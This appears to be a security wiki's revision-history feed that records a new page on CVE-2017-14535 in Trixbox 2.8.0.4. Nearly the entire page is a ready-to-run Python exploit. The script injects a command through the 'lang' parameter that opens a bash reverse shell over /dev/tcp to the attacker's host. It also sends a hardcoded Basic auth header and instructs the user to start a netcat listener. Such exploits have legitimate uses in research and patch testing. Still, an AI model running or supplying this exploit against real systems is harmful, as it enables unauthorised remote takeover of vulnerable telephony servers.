https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2017-14535_Trixbox_2.8.0.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2017-14535 Trixbox 2.8.0.4 遠程代碼執行漏洞 - Revision history
2026-04-15T01:04:22Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2017-14535_Trixbox_2.8.0.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3602&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: http..."
2021-05-28T09:48:44Z
<p>Created page with "==EXP== <pre> # Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: http..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)<br />
# Date: 27.05.2021<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/<br />
# Credits to: Sachin Wagh<br />
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/<br />
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download<br />
# Version: 2.8.0.4<br />
# Tested on: Xubuntu 20.04<br />
# CVE: CVE-2017-14535<br />
<br />
'''<br />
Description:<br />
trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php<br />
'''<br />
<br />
<br />
<br />
'''<br />
Import required modules:<br />
'''<br />
import requests<br />
import sys<br />
import time<br />
<br />
<br />
'''<br />
User-input:<br />
'''<br />
target_ip = sys.argv[1]<br />
target_port = sys.argv[2]<br />
listen_ip = sys.argv[3]<br />
listen_port = sys.argv[4]<br />
<br />
<br />
'''<br />
Construct malicious request:<br />
'''<br />
# Construct header:<br />
header = {<br />
'Host': target_ip,<br />
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',<br />
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',<br />
'Connection': 'close',<br />
'Upgrade-Insecure-Requests': '1',<br />
'Cache-Control': 'max-age=0'<br />
}<br />
<br />
# Construct malicious link:<br />
link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'<br />
link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'<br />
link = link_p1 + link_p2<br />
<br />
<br />
'''<br />
Finish: EXPLOIT!!!<br />
'''<br />
print('')<br />
print('')<br />
print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)<br />
print('')<br />
time.sleep(2)<br />
Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")<br />
if Ready == 'EXPLOIT':<br />
print('')<br />
print('Exploit sent, check your Netcat instance :)')<br />
x = requests.post(link, headers=header)<br />
else:<br />
print('TRY AGAIN')<br />
</pre></div>
Pwnwiki